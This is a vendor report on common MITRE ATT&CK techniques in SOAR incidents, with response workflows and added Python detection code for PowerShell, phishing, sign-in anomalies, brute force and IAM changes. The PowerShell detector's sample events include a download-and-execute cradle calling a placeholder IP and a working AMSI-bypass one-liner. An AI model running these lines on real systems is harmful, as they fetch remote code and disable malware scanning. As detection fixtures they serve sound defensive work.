SOAR platforms collect the incidents a security team handles into a single, centralized queue: endpoint, SIEM, email, behavioral, and network alerts all land in one place. That makes SOAR analytics a useful way to understand your overall security environment and the threats you face day to day.
D3 Labs analyzed 75,331 incidents in order to determine the 10 most common MITRE ATT&CK techniques. This dataset was derived from a subset of our customers who are based in North America and Europe.
In this report, you’ll see the findings of our study, as well as automated incident response playbooks you can deploy to ensure you have an effective answer to these threats.
About D3 Labs
D3 Labs represents the research and development backbone of D3 Security, consisting of a dedicated team of cybersecurity analysts, automation engineers, network architects, and threat researchers. This skilled group is tasked with simulating attacks, utilizing the same security tools employed by D3’s clients, to identify and bridge detection and response gaps within those tools. In addition to testing and refining cybersecurity measures, D3 Labs is instrumental in developing and maintaining an extensive library of industry-best integrations, thereby minimizing the complexity and number of steps clients need to incorporate into their playbooks, even for the most sophisticated and unique workflows.
What Are MITRE ATT&CK Tactics and Techniques?
MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. In ATT&CK, tactics represent the “why” of an adversary’s actions: their objectives during an attack, such as initial access, defense evasion, and execution. Each tactic contains many techniques, which represent the “how”: the specific methods adversaries use to achieve that objective, such as exploiting a software vulnerability, phishing, or keylogging. A single technique can appear under several tactics when it serves more than one goal.
Read: What Are MITRE ATT&CK and MITRE D3FEND?
Key Findings
The most common technique in our dataset is Command and Scripting Interpreter (T1059), present in 52.22% of incidents, which shows how heavily attackers rely on scripts to execute payloads. Phishing (T1566) is the primary initial access method, responsible for 15.44% of incidents. Less common techniques include Brute Force (T1110) for credential access at 2.05%, OS Credential Dumping (T1003) at 1.37%, and persistence through Account Manipulation (T1098) at 1.34%. All other tactics and techniques together account for 13.56%, reflecting the broad range of attack strategies seen. The following is an analysis of each technique, along with examples of incident response workflows that can be orchestrated using D3’s Smart SOAR platform.
Detection, Monitoring, and Response in Smart SOAR
D3’s Smart SOAR detects MITRE tactics and techniques in three different places: on ingestion, at the event level, and at the incident level. All MITRE detections are collected and displayed in the MITRE ATT&CK Monitor dashboard, which gives security professionals an at-a-glance view of their threat landscape. Users can create custom detection logic directly in the platform to ensure all data is relevant and up to date.
When an event or incident is tagged with a specific MITRE tactic or technique, the corresponding playbook can be attached to it, ensuring teams are following the right protocol for each unique threat. Here you can see an incident that has been categorized as a Credential Access: Brute Force threat, with the corresponding response playbook attached.
Screenshots: Tactic & Technique Tag; Incident Response Playbook
Analysis of Tactics and Techniques
Execution: Command and Scripting Interpreter (T1059)
Command and Scripting Interpreter threats, the most frequently detected technique at 52.22%, involve attackers leveraging popular scripting languages like PowerShell, Bash, Python, and JavaScript. These languages are used to create scripts that automate various malicious activities including data harvesting, system manipulation, and malware deployment without direct user interaction. For instance, an attacker might use a PowerShell script to download and execute a ransomware payload on a victim’s computer.
The same interpreters serve defense evasion. Attackers use scripts to disable, reconfigure, or bypass security controls such as antivirus, EDR agents, and intrusion detection and prevention systems (IDS/IPS), and to obfuscate what they run: PowerShell’s -EncodedCommand switch, for example, carries the script as base64-encoded UTF-16 text, which also defeats naive keyword matching on command lines. Process command-line telemetry that decodes such arguments is therefore a key detection source for this technique.
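The detection logic described above, as an added example that is not part of D3 Security’s platform or this report: it decodes PowerShell -EncodedCommand arguments from process-creation command lines and flags download cradles, in-memory execution, AMSI tampering and stealth switches. The sample events are constructed (the encoded one is built by the block’s own helper, and 203.0.113.5 is a documentation address), and the indicator lists are a starting point, not a complete rule set.

```python
"""Detection logic for T1059.001 (PowerShell): decode -EncodedCommand
payloads and flag download cradles, in-memory execution and AMSI tampering.
Added example; not code from D3 Security.  Sample events are constructed."""
import base64
import binascii
import re

# powershell.exe / pwsh accept any unambiguous prefix of -EncodedCommand;
# the payload is base64 over the UTF-16LE bytes of the script text.
ENCODED_ARG = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+[\"']?([A-Za-z0-9+/=]{16,})", re.I)
PS_IMAGE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)

# Indicator categories, each a case-insensitive regex run over the visible
# command line plus the decoded script (if any).
INDICATORS = {
    "download_cradle": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                       r"|net\.webclient|start-bitstransfer",
    "in_memory_exec": r"\biex\b|invoke-expression|frombase64string",
    "amsi_tamper": r"amsiutils|amsiinitfailed",
    "stealth_flags": r"-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden"
                     r"|-e(?:p|xecutionpolicy)\s+bypass",
}


def encode_ps(script: str) -> str:
    """Build the -EncodedCommand argument for a script (used here only to
    construct the sample events below)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script carried by -EncodedCommand, or None when the
    argument is absent, is not valid base64, or cannot be UTF-16LE text."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:  # UTF-16 text always has an even byte length
        return None
    return raw.decode("utf-16le", errors="replace")


def analyze(cmdline: str) -> dict:
    """Classify one process-creation command line; technique is set only
    when the image is PowerShell and at least one indicator fires."""
    result = {"cmdline": cmdline, "decoded": None, "indicators": [], "technique": None}
    if not PS_IMAGE.search(cmdline):
        return result
    decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + (decoded or "")
    hits = [cat for cat, pat in INDICATORS.items() if re.search(pat, text, re.I)]
    if ENCODED_ARG.search(cmdline):
        # An encoded argument that will not decode is itself worth a look.
        hits.append("encoded_command" if decoded is not None
                    else "undecodable_encoded_command")
    result.update(decoded=decoded, indicators=hits,
                  technique="T1059.001" if hits else None)
    return result


# Constructed sample events (command lines from process-creation telemetry).
SAMPLE_EVENTS = [
    # benign scheduled backup script
    "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1",
    # encoded download cradle pulling a second stage from a documentation IP
    "powershell.exe -NoP -W Hidden -Enc " + encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"),
    # plaintext AMSI bypass
    "powershell -c \"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\"",
    # -enc with a payload that is not valid base64 (bad padding)
    "powershell -enc " + "A" * 22,
]

if __name__ == "__main__":
    for r in (analyze(e) for e in SAMPLE_EVENTS):
        print(r["technique"], r["indicators"], (r["decoded"] or "")[:60])
```

Decoding before matching is the point: the cradle in the second sample contains none of the indicator strings in its visible command line, so a rule that only inspects the raw command line would miss it.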
Incident Response Workflow for Scripting Attacks
The workflow above uses SentinelOne to monitor active agent processes and terminate malicious ones from within the Smart SOAR platform itself. It then uses Microsoft Entra ID (formerly Azure Active Directory) to change the device’s script execution policy and reset the user’s password. One caveat: PowerShell’s execution policy is not a security boundary. It is overridden with -ExecutionPolicy Bypass or by piping script text into the interpreter, so treat the policy change as hygiene and rely on process termination and application control (AppLocker or WDAC) for actual containment. Implementing an incident response workflow means organizations can reduce the time between detection and containment for scripting attacks.
Initial Access: Phishing (T1566)
Phishing is a common technique used by attackers to gain initial access to a target’s systems or network. This method involves the deceptive practice of sending emails that appear to be from a trusted source to induce individuals to reveal personal information, such as passwords and credit card numbers, or to convince them to download and install malware.
Common indicators of a phishing attempt include:
- Urgency – Messages that create a sense of immediate action or panic, like “Immediate Action Required.”
- Unknown Sender – Emails from unfamiliar or unusual addresses.
- Poor Grammar – Misspellings, grammar mistakes, or unusual phrasing.
- Generic Greetings – Phrases like “Dear Customer” instead of your name.
- Suspicious Attachments – Unexpected attachments or links.
- Mismatched URLs – Hyperlinks that don’t match the displayed text or lead to suspicious sites.
- Unusual Requests – Requests for sensitive information or money that seem out of place.
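The mismatched-URL indicator from the list above, turned into a check that runs over an HTML message body. This is an added example, not code from D3 Security or its Smart SOAR playbooks; the message is constructed and uses reserved example.com and .invalid names, and the eTLD+1 helper is a deliberate simplification (it takes the last two labels instead of consulting the Public Suffix List).

```python
"""Check the links in an HTML email body for the 'mismatched URL' indicator
(anchor text advertises one domain, href goes to another), plus IP-literal
and punycode hosts.  Added example, not D3 Security code; the message body
is constructed and uses reserved example/.invalid names."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A domain or URL in the visible link text; the last label must be alphabetic
# so that 'e.g.' or an IP address in prose does not count as a domain.
DOMAIN_IN_TEXT = re.compile(
    r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> elements."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def host_of(url: str) -> str:
    """Hostname of an http(s) URL (bare 'www.example.com/x' accepted); empty
    for mailto:, tel:, javascript: and the like."""
    p = urlparse(url)
    if not p.scheme:
        p = urlparse("http://" + url)
    elif p.scheme not in ("http", "https"):
        return ""
    return (p.hostname or "").lower()


def registrable(host: str) -> str:
    """Crude eTLD+1 (last two labels): separates example.com from
    example.com.evil.invalid, but not co.uk-style suffixes.  Production code
    should use the Public Suffix List."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def check_link(href: str, text: str) -> list:
    """Return the indicator names that fire for one link (empty if clean)."""
    findings = []
    actual = host_of(href)
    if not actual:
        return findings
    try:
        ipaddress.ip_address(actual)
        findings.append("ip_literal_host")
    except ValueError:
        pass
    if actual.startswith("xn--") or ".xn--" in actual:
        findings.append("punycode_host")
    m = DOMAIN_IN_TEXT.search(text)
    if m and registrable(m.group(1)) != registrable(actual):
        findings.append("mismatched_url")
    return findings


def scan_email_html(html: str) -> list:
    """Every link in the body that triggers at least one indicator."""
    collector = LinkCollector()
    collector.feed(html)
    flagged = []
    for href, text in collector.links:
        findings = check_link(href, text)
        if findings:
            flagged.append({"href": href, "text": text, "findings": findings})
    return flagged


# Constructed phishing body: a lookalike link, an IP-literal link, and two
# legitimate links that must not fire.
SAMPLE_EMAIL = """\
<p>Dear Customer,</p>
<p>Immediate action required: verify your account within 24 hours at
<a href="http://example.com.account-verify.invalid/login">https://www.example.com/login</a>.</p>
<p>Or use our secure portal: <a href="http://203.0.113.9/login">Secure Portal</a></p>
<p>Questions? See <a href="https://www.example.com/help">https://www.example.com/help</a>
or write to <a href="mailto:support@example.com">support@example.com</a>.</p>
"""

if __name__ == "__main__":
    for hit in scan_email_html(SAMPLE_EMAIL):
        print(hit["findings"], hit["href"])
```

The first link is the textbook case: the visible text says example.com, but the registrable domain of the target is account-verify.invalid, so a user who trusts what they read is sent elsewhere. Run the same check on the From display name versus the envelope sender to cover the "unknown sender" indicator.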
Incident Response Workflow for Phishing Attacks
We’ve written a full blog on how to use SOAR to defend against phishing attacks. One of our many workflows for phishing is illustrated above. In this workflow, which runs during the containment stage, Okta deactivates the compromised account, then Microsoft Defender for Endpoint isolates the host and quarantines the file. In parallel, Office 365 deletes the email from mailboxes and Zscaler blocks the malicious URL or IP address the device may be communicating with.
Phishing and spear-phishing attacks represent a significant threat as they often serve as the entry point for more sophisticated attacks. Defending against these attacks requires a combination of technical controls, user education, and robust security policies. By understanding the nature of these threats and implementing a layered defense strategy, organizations can significantly reduce their risk of falling victim to phishing and spear-phishing campaigns.
Initial Access: Valid Accounts (T1078)
Valid Accounts (T1078) is a technique rather than a tactic: ATT&CK lists it under Initial Access, Persistence, Privilege Escalation, and Defense Evasion, because legitimate credentials serve all of those goals. It involves using stolen or guessed user credentials, such as usernames and passwords, to bypass security measures and gain unauthorized access to systems and data. It is particularly dangerous because nothing is exploited: the attacker’s sessions look like normal user activity, which lets them operate undetected for extended periods.
Incident Response Workflow for Valid Account Threats
The workflow above is an example of how SOAR users can automate incident response to valid account threats. It monitors user activity logs for location anomalies, comparing the detected IP locations against each user’s expected locations to identify potential unauthorized access attempts, then verifies with the user before initiating a response. The verification must go through a channel other than the account under investigation, such as a registered phone or a separate authenticator, so that an attacker who holds the mailbox cannot approve their own sign-in.
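The location-anomaly logic described above, as an added example that is not D3 Security’s workflow: it flags sign-ins from outside a user’s expected countries and “impossible travel” between consecutive sign-ins, then models the verify-before-act step with a callback standing in for the out-of-band channel. The sign-in records (documentation IP addresses, approximate city coordinates such as a geo-IP lookup would return) and the expected-country baseline are constructed; the 900 km/h threshold is an assumption chosen to sit above airliner speed.

```python
"""Location-anomaly detection for Valid Accounts (T1078) sign-ins: flag
sign-ins outside a user's expected countries and impossible travel between
consecutive sign-ins.  Added example, not D3 Security code; the sign-in
records and the expected-country baseline are constructed."""
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 900.0   # assumption: faster than a commercial flight


def haversine_km(a, b):
    """Great-circle distance between two (lat, lon) pairs in degrees."""
    lat1, lon1 = map(radians, a)
    lat2, lon2 = map(radians, b)
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(h))


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def detect_location_anomalies(signins, expected_countries, max_kmh=MAX_PLAUSIBLE_KMH):
    """One finding per anomalous sign-in.  Each sign-in is a dict with user,
    ts, ip, country, city and geo=(lat, lon), as a geo-IP lookup would give."""
    findings = []
    last_seen = {}   # user -> previous sign-in, for the travel check
    for ev in sorted(signins, key=lambda e: (e["user"], parse_ts(e["ts"]))):
        user, ts = ev["user"], parse_ts(ev["ts"])
        if ev["country"] not in expected_countries.get(user, set()):
            findings.append({"user": user, "type": "unexpected_location",
                             "ip": ev["ip"], "country": ev["country"], "ts": ev["ts"]})
        prev = last_seen.get(user)
        if prev is not None:
            hours = (ts - parse_ts(prev["ts"])).total_seconds() / 3600
            km = haversine_km(prev["geo"], ev["geo"])
            if hours > 0:
                speed = km / hours
            else:                       # same second, different place
                speed = float("inf") if km > 0 else 0.0
            if speed > max_kmh:
                findings.append({"user": user, "type": "impossible_travel",
                                 "from": prev["city"], "to": ev["city"],
                                 "km": round(km), "speed_kmh": round(speed),
                                 "ts": ev["ts"]})
        last_seen[user] = ev
    return findings


def respond(findings, confirm_with_user):
    """Containment decision: ask the user over an out-of-band channel first
    (confirm_with_user stands in for that integration), then act."""
    actions = []
    for user in sorted({f["user"] for f in findings}):
        if confirm_with_user(user):
            actions.append((user, "close_as_benign"))
        else:
            actions.append((user, "revoke_sessions_and_reset_password"))
    return actions


# Constructed sign-in records; coordinates are approximate city centres.
SAMPLE_SIGNINS = [
    {"user": "alice", "ts": "2024-03-04T09:00:00Z", "ip": "198.51.100.10",
     "country": "CA", "city": "Vancouver", "geo": (49.28, -123.12)},
    {"user": "alice", "ts": "2024-03-04T09:45:00Z", "ip": "203.0.113.77",
     "country": "DE", "city": "Berlin", "geo": (52.52, 13.40)},
    {"user": "bob", "ts": "2024-03-04T08:00:00Z", "ip": "198.51.100.11",
     "country": "CA", "city": "Vancouver", "geo": (49.28, -123.12)},
    {"user": "bob", "ts": "2024-03-04T11:00:00Z", "ip": "192.0.2.25",
     "country": "US", "city": "Seattle", "geo": (47.61, -122.33)},
]
EXPECTED_COUNTRIES = {"alice": {"CA"}, "bob": {"CA", "US"}}

if __name__ == "__main__":
    found = detect_location_anomalies(SAMPLE_SIGNINS, EXPECTED_COUNTRIES)
    for f in found:
        print(f)
    print(respond(found, lambda user: False))
```

Alice trips both rules (Berlin is outside her baseline, and Vancouver to Berlin in 45 minutes is not possible), while Bob’s Vancouver-to-Seattle drive three hours apart stays quiet. Geo-IP is noisy for mobile carriers and VPN egress points, so in practice the baseline should include known corporate VPN locations before the impossible-travel rule is allowed to trigger automated resets.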
Initial Access: Spearphishing (T1566.001-004)
Spearphishing is a targeted email attack aimed at specific individuals or organizations. Where standard phishing sends generic messages to many recipients, spearphishing personalizes each message with information collected about the target. Spearphishing emails are reportedly opened by targets in 70% of cases, compared with a 3% open rate for mass spam. Recognizing spearphishing helps users strengthen their defenses.
ATT&CK tracks spearphishing as sub-techniques of T1566 (Phishing): Spearphishing Attachment (T1566.001), Spearphishing Link (T1566.002), Spearphishing via Service (T1566.003), and Spearphishing Voice (T1566.004). Because the attack targets a specific user or organization, incident response playbooks can help by flagging potentially high-value target accounts such as the Chief Executive Officer. In Smart SOAR, the event playbook can identify threats involving specific user accounts and escalate them, ensuring the executive’s account has not been compromised and that employees are aware of the active spearphishing campaign.
Following this escalation, incident response playbooks can be used to force a password reset and refresh user sign-in sessions using popular identity and access management (IAM) tools.
Credential Access: Brute Force (T1110)
Brute Force (T1110) covers attacks that guess credentials rather than steal them. ATT&CK splits it into password guessing (T1110.001: many passwords against one account), password cracking (T1110.002: offline attacks on captured hashes), password spraying (T1110.003: one common password against many accounts, which stays under per-account lockout thresholds), and credential stuffing (T1110.004: replaying username and password pairs leaked from other breaches). The online variants exploit weak password policies, such as common or default passwords, and the absence of account lockout or rate-limiting controls. Spraying and stuffing are designed specifically to evade per-account lockout, so detection has to count activity per source as well as per account.
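The per-source and per-account counting just described, as an added example that is not D3 Security’s playbook: a sliding-window detector over sshd authentication lines that separates password guessing from password spraying and raises a separate finding when a flagged source then succeeds. The log lines are constructed (documentation IP addresses, fictitious accounts) and the thresholds are assumptions to be tuned to an environment’s normal failure rate.

```python
"""Sliding-window detection of Brute Force (T1110) sub-techniques over SSH
auth logs: password guessing (one source hammering one account), password
spraying (one source touching many accounts) and a success that follows
either.  Added example, not D3 Security code; the log lines are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")


def parse(lines):
    """Yield {ts, result, user, ip} for each sshd auth line that matches."""
    for line in lines:
        m = LINE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
            yield ev


def detect_brute_force(events, window_s=300, max_failures=5, spray_users=8):
    """One finding per (technique, key) within the window.  Thresholds are
    assumptions; tune them to the environment's normal failure rate."""
    findings, alerted = [], set()
    pair_failures = defaultdict(deque)   # (ip, user) -> failure timestamps
    ip_users = defaultdict(dict)         # ip -> {user: last failure ts}
    for ev in sorted(events, key=lambda e: e["ts"]):
        ip, user, ts = ev["ip"], ev["user"], ev["ts"]
        if ev["result"] == "Failed":
            q = pair_failures[(ip, user)]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:   # expire old ones
                q.popleft()
            if len(q) >= max_failures and ("guess", ip, user) not in alerted:
                alerted.add(("guess", ip, user))
                findings.append({"technique": "T1110.001", "type": "password_guessing",
                                 "ip": ip, "user": user, "failures": len(q), "ts": ts})
            ip_users[ip][user] = ts
            recent = [u for u, t in ip_users[ip].items()
                      if (ts - t).total_seconds() <= window_s]
            if len(recent) >= spray_users and ("spray", ip) not in alerted:
                alerted.add(("spray", ip))
                findings.append({"technique": "T1110.003", "type": "password_spraying",
                                 "ip": ip, "users": len(recent), "ts": ts})
        elif ("guess", ip, user) in alerted or ("spray", ip) in alerted:
            # A success from a source already flagged is the alert that matters.
            findings.append({"technique": "T1110", "type": "success_after_attack",
                             "ip": ip, "user": user, "ts": ts})
    return findings


# Constructed sshd log: a guessing run that succeeds, a user who mistypes twice,
# and a spray across ten accounts from a second source.
SAMPLE_LOG = (
    [f"2024-03-04T10:00:0{i}Z sshd[4010]: Failed password for alice "
     f"from 203.0.113.5 port 5{i}000 ssh2" for i in range(1, 7)]
    + ["2024-03-04T10:00:30Z sshd[4010]: Accepted password for alice "
       "from 203.0.113.5 port 57000 ssh2",
       "2024-03-04T10:02:00Z sshd[4020]: Failed password for bob from 192.0.2.8 port 40100 ssh2",
       "2024-03-04T10:02:05Z sshd[4020]: Failed password for bob from 192.0.2.8 port 40101 ssh2",
       "2024-03-04T10:02:20Z sshd[4020]: Accepted password for bob from 192.0.2.8 port 40102 ssh2"]
    + [f"2024-03-04T10:05:{i:02d}Z sshd[4030]: Failed password for invalid user svc{i:02d} "
       f"from 198.51.100.20 port 41000 ssh2" for i in range(10)]
)

if __name__ == "__main__":
    for finding in detect_brute_force(parse(SAMPLE_LOG)):
        print(finding)
```

Bob’s two failures never reach the per-account threshold and produce nothing; the spray source never fails more than once per account, so only the per-source count catches it. The success_after_attack finding is the one to page on: it means the guessing worked and the account needs a reset and session revocation, not just a source block.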
Incident Response Workflow for Brute Force Attacks
Similar to phishing, we’ve written a lengthy description of how to build a SOAR playbook to address brute force attacks. It’s also designed following MITRE D3FEND best practices.
Brute force attacks are rudimentary, yet, as our research shows, they are still a prevalent threat in the cybersecurity landscape, exploiting weak password practices and inadequate security policies. By implementing strong defensive measures, including robust password policies, MFA, and continuous monitoring, organizations can significantly mitigate the risk of unauthorized access through brute force methods. Educating users on secure password practices further reinforces an organization’s defense against these types of attacks.
Credential Access: OS Credential Dumping (T1003)
After gaining access, attackers extract credential material from the operating system: password hashes from LSASS process memory (T1003.001), the local SAM database (T1003.002), or the Active Directory database Ntds.dit on domain controllers (T1003.003). Hashes dumped this way can be cracked offline or used directly in pass-the-hash attacks, letting attackers elevate their privileges and reach sensitive intellectual property.
Incident Response Workflow for OS Credential Dumping Threats
Playbooks like the one above can be used to confirm credential dumping alerts and apply mitigations, such as adding affected user accounts to protected groups in Microsoft Entra ID and notifying local administrators of password complexity requirements. One caveat a responder should keep in mind: stronger policies do not invalidate credentials that have already been dumped. Every account whose hash was exposed needs a password reset, and if Ntds.dit was taken, the krbtgt account password must be reset twice (allowing replication in between) to invalidate forged Kerberos tickets.
Persistence: Account Manipulation (T1098)
Persistence through account manipulation involves attackers altering an existing account so that their access survives a password change or a first round of cleanup. This includes adding credentials to the account (an extra SSH key, API key, or a second authenticator), changing its permissions or group memberships to elevate privileges, or modifying its properties to blend in. Creating brand-new accounts is tracked separately as Create Account (T1136). Either way, the attacker ends up with access that passes normal authentication and authorization checks, because the account itself is now configured to let them in.
Incident Response Workflow for Account Manipulation
The workflow above uses AWS IAM to manage individual user permissions. IAM integrations let SOAR verify a user’s expected access and change their profile from the SOAR interface itself; in this example, an unexpected user policy is removed.
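The IAM triage step described above, as an added example that is not D3 Security’s workflow: it reads CloudTrail records for account-manipulating IAM calls, compares each change against a per-user baseline of expected policies and groups, and emits the boto3 IAM client calls that revert anything outside that baseline. The event records are constructed to follow CloudTrail’s shape (eventSource, eventName, userIdentity, requestParameters, responseElements), the baseline is hypothetical, and the access key ID is AWS’s documentation example; the DryRunIAM stub records calls instead of making them, so the block runs offline.

```python
"""Triage of IAM Account Manipulation (T1098) from CloudTrail: flag IAM
changes outside a per-user baseline and emit the boto3 IAM calls that undo
them.  Added example, not D3 Security code.  Records are constructed in
CloudTrail's shape; the baseline is hypothetical."""


# IAM calls that grant access, mapped to the boto3 IAM method that reverts each.
def _attach_policy(p, r):
    return "detach_user_policy", {"UserName": p["userName"], "PolicyArn": p["policyArn"]}


def _put_policy(p, r):
    return "delete_user_policy", {"UserName": p["userName"], "PolicyName": p["policyName"]}


def _add_to_group(p, r):
    return "remove_user_from_group", {"UserName": p["userName"], "GroupName": p["groupName"]}


def _create_key(p, r):
    return "delete_access_key", {"UserName": p["userName"],
                                 "AccessKeyId": r["accessKey"]["accessKeyId"]}


REVERT = {"AttachUserPolicy": _attach_policy, "PutUserPolicy": _put_policy,
          "AddUserToGroup": _add_to_group, "CreateAccessKey": _create_key}


def is_expected(event, baseline):
    """True when the change matches what the baseline already allows."""
    p = event.get("requestParameters") or {}
    allowed = baseline.get(p.get("userName"), {})
    name = event["eventName"]
    if name == "AttachUserPolicy":
        return p["policyArn"] in allowed.get("policies", set())
    if name == "AddUserToGroup":
        return p["groupName"] in allowed.get("groups", set())
    return False   # inline policies and new access keys always need review


def triage(events, baseline):
    """Findings for IAM changes outside the baseline, each with a revert plan."""
    findings = []
    for ev in events:
        if ev.get("eventSource") != "iam.amazonaws.com" or ev["eventName"] not in REVERT:
            continue
        if is_expected(ev, baseline):
            continue
        p, r = ev.get("requestParameters") or {}, ev.get("responseElements") or {}
        actor = ev.get("userIdentity", {}).get("userName")
        method, kwargs = REVERT[ev["eventName"]](p, r)
        findings.append({
            "technique": "T1098", "event": ev["eventName"],
            "actor": actor, "target": p.get("userName"),
            # a principal granting itself access is the classic escalation pattern
            "severity": "high" if actor == p.get("userName") else "medium",
            "revert": (method, kwargs),
        })
    return findings


def apply_plan(findings, iam):
    """Run the revert calls against an IAM client: boto3.client('iam') in
    production, DryRunIAM here."""
    return [getattr(iam, method)(**kwargs) for method, kwargs in (f["revert"] for f in findings)]


class DryRunIAM:
    """Records the calls a real boto3 client would receive."""
    def __init__(self):
        self.calls = []

    def __getattr__(self, name):
        def call(**kwargs):
            self.calls.append((name, kwargs))
            return {"dry_run": True}
        return call


# Constructed CloudTrail-shaped records.
SAMPLE_EVENTS = [
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",   # self-escalation
     "userIdentity": {"type": "IAMUser", "userName": "deploy-bot"},
     "requestParameters": {"userName": "deploy-bot",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"},
     "responseElements": None},
    {"eventSource": "iam.amazonaws.com", "eventName": "AddUserToGroup",     # in baseline
     "userIdentity": {"type": "IAMUser", "userName": "admin"},
     "requestParameters": {"userName": "deploy-bot", "groupName": "ci"},
     "responseElements": None},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",    # key for another user
     "userIdentity": {"type": "IAMUser", "userName": "deploy-bot"},
     "requestParameters": {"userName": "alice"},
     "responseElements": {"accessKey": {"accessKeyId": "AKIAIOSFODNN7EXAMPLE",
                                        "status": "Active", "userName": "alice"}}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject",           # unrelated, ignored
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": {"bucketName": "logs"}, "responseElements": None},
]
BASELINE = {"deploy-bot": {"policies": {"arn:aws:iam::aws:policy/ReadOnlyAccess"},
                           "groups": {"ci"}}}

if __name__ == "__main__":
    client = DryRunIAM()
    apply_plan(triage(SAMPLE_EVENTS, BASELINE), client)
    print(client.calls)
```

The revert plan is data before it is action, which is what a SOAR playbook needs: it can be shown to an analyst for approval, or auto-applied only for the high-severity self-escalation case. Note the reverts only remove what the event added; a principal that attached AdministratorAccess to itself should also have its own access keys rotated, since whoever issued that call already holds them.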
Closing Thoughts
D3 Labs’ analysis of the 10 most common MITRE ATT&CK techniques offers crucial insights into today’s cybersecurity challenges. Among the core findings, adversaries’ continued use of established techniques, such as Command and Scripting Interpreter threats and Phishing, is particularly noteworthy. This reliance on familiar methods paints a picture of a threat landscape where traditional attack vectors remain prominent.
The report also sheds light on the importance of effective process monitoring and the capability to take immediate action against threats, particularly in the context of scripting attacks and unauthorized account access. It underscores the fact that attackers not only exploit technical vulnerabilities but also leverage legitimate system and network functions to their advantage.
D3 Labs’ findings emphasize the need for organizations to reassess and strengthen their cybersecurity frameworks in light of persistent and evolving threats. Highlighting the significance of rapid detection and response capabilities against scripting attacks and unauthorized access, the data illustrates the need for an automation-assisted approach to incident response.